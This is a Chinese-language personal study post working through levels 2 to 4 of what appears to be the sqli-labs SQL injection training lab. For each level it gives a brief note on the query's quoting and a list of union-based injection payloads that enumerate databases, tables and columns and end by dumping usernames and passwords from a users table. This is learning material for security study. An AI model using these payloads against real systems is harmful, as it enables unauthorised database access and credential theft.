sql注入个人学习之旅2

less2

与less1类似，首先输入id=1’,报错，如图
类同less1，易得$sql="SELECT*FROM users WHERE id= $id LIMIT 0,1"这次 $id周遭没有引号，所以无需再用–+或#来消去多余的引号了，因为压根没有呀，所以套用less1，这里就不一一赘述了，只是附上代码了

1.id=1 order by 3
2.id=-1 union select 1,2,3
3.id=-1 union select 1,group_concat(schema_name),3from information_schema.schemata
4.id=-1 union select 1,group_concat(table_name),3from information_schema.tables where table_schema="security"
5.id=-1 union select 1,group_concat(column_name),3from information_schema.columns where table_name="users"
6.id=-1 union select 1,username,password from users where id=1

less3

仍是照葫芦画瓢
这次，很明显用(’’)取代了less1中的’’
附代码如下

1.id=1') order by 3--+
2.id=-1') union select 1,2,3--+
3.id=-1') union select 1,group_concat(schema_name),3from information_schema.schemata--+
4.id=-1') union select 1,group_concat(table_name),3from information_schema.tables where table_schema="security"--+
5.id=-1') union select 1,group_concat(column_name),3from information_schema.columns where table_name="users"--+
6.id=-1') union select 1,username,password from users where id=1--+

less4

这次又是要画一个瓢，用("")代替了less1中的（’’）
附图与代码如下

1.id=1") order by 3--+
2.id=-1") union select 1,2,3--+
3.id=-1") union select 1,group_concat(schema_name),3from information_schema.schemata--+
4.id=-1") union select 1,group_concat(table_name),3from information_schema.tables where table_schema="security"--+
5.id=-1") union select 1,group_concat(column_name),3from information_schema.columns where table_name="users"--+
6.id=-1") union select 1,username,password from users where id=1--+